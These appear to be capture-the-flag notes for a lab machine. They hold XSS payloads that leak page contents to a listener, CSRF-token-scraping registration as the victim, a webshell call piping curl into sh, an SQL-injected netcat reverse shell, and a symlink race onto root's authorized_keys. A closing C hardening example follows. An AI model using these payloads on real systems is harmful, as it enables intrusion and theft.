xct's notes
Crossfit
Notes for https://youtu.be/jSYRyhY9JuE
User
Payload.js (browse to page & retrieve contents)
```javascript
// Fetch the target page from inside the victim's browser
xhr = new XMLHttpRequest();

// Once it loads, leak the page body to the listener on 10.10.14.10
xhr.onload = function() {
    x = new XMLHttpRequest();
    x.open("GET", 'http://10.10.14.10/?' + xhr.response);
    x.send(null);
}

xhr.open("GET", 'http://ftp.crossfit.htb/accounts/create', false);
xhr.send(null);
```
Register.js (send POST request as victim)
```javascript
user = 'foo'
pass = 'foo'

// Requests carry the victim's cookies, so the registration happens as them
xhr = new XMLHttpRequest;
xhr.withCredentials = true;

// Every response is leaked back to the listener on 10.10.14.10
xhr.onload = function() {
    x = new XMLHttpRequest();
    x.open("GET", 'http://10.10.14.10/?' + xhr.response);
    x.send(null);
}
// Load the form first to read its CSRF token
xhr.open('GET', 'http://ftp.crossfit.htb/accounts/create', false);
xhr.send(null);

r = /token" value="(.*)"/g;
token = r.exec(xhr.responseText)[1];

// Submit the form with the freshly read token
var params = '_token=' + token + '&username=' + user + '&pass=' + pass
xhr.open('POST', "http://ftp.crossfit.htb/accounts", false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);
```
Shell.js (execute webshell command via XSS)
```javascript
xhr = new XMLHttpRequest();

// Leak the webshell's response to the listener on 10.10.14.10
xhr.onload = function() {
    x = new XMLHttpRequest();
    x.open("GET", 'http://10.10.14.10/?' + xhr.response);
    x.send(null);
}

// Call the uploaded webshell on the internal vhost
xhr.open("GET", 'http://development-test.crossfit.htb/xct.php?xcmd=curl 10.10.14.10/x|/bin/sh', false);
xhr.send(null);
```
Root
Guess.c
```c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

// Seed with the current second and print the first rand() value;
// the race loop below feeds this output to md5sum
int main(void){
    srand(time(0));
    printf("%d", rand());
    return 0;
}
```
Become ftpadm
```shell
su -s /bin/bash -c 'echo 123>/srv/ftp/messages/123' ftpadm
```
```sql
insert into users (id,email) VALUES (0,'[email protected] --wrong-argument || nc.traditional 10.10.14.10 1337 -e /bin/sh');
```
Race to Root (as hank)
```shell
# Keep linking the next predicted message path to root's authorized_keys
while true; do ln -s /root/.ssh/authorized_keys /var/local/$(echo -ne $(./guess)1000 | md5sum | awk '{ print $1 }') 2>/dev/null; done
```
```sql
insert into messages (id, name, email, message) VALUES (1000, 'ssh-ed25519', '[email protected]', 'AAAAC3NzaC1lZDI1NTE5AAAAINvEpPGmpbIYTXl69lGbFlPa137agV6rvHGq5PgU5vsF');
```
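The root step above works because the message file's name follows from srand(time(0)) and the writer happily follows a symlink planted at that name. As an added hardening example (not from xct's notes or the box itself), the writer below draws the name from getrandom() and creates the file with O_EXCL|O_NOFOLLOW; Linux with glibc 2.25+ and a writable directory such as /tmp are assumed, and the selftest plants its own symlink only to confirm the guard holds.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/random.h>
#include <unistd.h>

/* Same generator as Guess.c: whoever knows the second knows the value. */
int weak_token(unsigned seed) { srand(seed); return rand(); }
/* 16 bytes from the kernel CSPRNG as 32 hex chars; out_len must be >= 33. */
int random_hex_name(char *out, size_t out_len) {
    unsigned char raw[16];
    if (out_len < 2 * sizeof raw + 1) return -1;
    if (getrandom(raw, sizeof raw, 0) != (ssize_t)sizeof raw) return -1;
    for (size_t i = 0; i < sizeof raw; i++) sprintf(out + 2 * i, "%02x", raw[i]);
    return 0;
}
/* Two fresh names never collide, unlike weak_token() called twice in one second. */
int names_are_distinct(void) {
    char a[33], b[33];
    if (random_hex_name(a, sizeof a) || random_hex_name(b, sizeof b)) return 0;
    return strlen(a) == 32 && strcmp(a, b) != 0;
}
/* Create dir/<random>; O_EXCL|O_NOFOLLOW makes open() fail instead of writing
 * through whatever already sits at that path, a planted symlink included. */
int create_exclusive(const char *dir, char *path, size_t len) {
    char name[33];
    if (random_hex_name(name, sizeof name)) return -1;
    if (snprintf(path, len, "%s/%s", dir, name) >= (int)len) return -1;
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}
/* Self-check: plant a symlink at a fresh path in dir and retry the guarded
 * create on it; returns 0 only if that create is refused (EEXIST/ELOOP). */
int selftest(const char *dir) {
    char target[4096], planted[4096], name[33];
    int fd = create_exclusive(dir, target, sizeof target), rc = 1;
    if (fd < 0) return rc;
    close(fd);
    if (!random_hex_name(name, sizeof name) &&
        snprintf(planted, sizeof planted, "%s/%s", dir, name) < (int)sizeof planted &&
        symlink(target, planted) == 0) {
        rc = (open(planted, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600) < 0 &&
              (errno == EEXIST || errno == ELOOP)) ? 0 : 2;
        unlink(planted);
    }
    unlink(target);
    return rc;
}
```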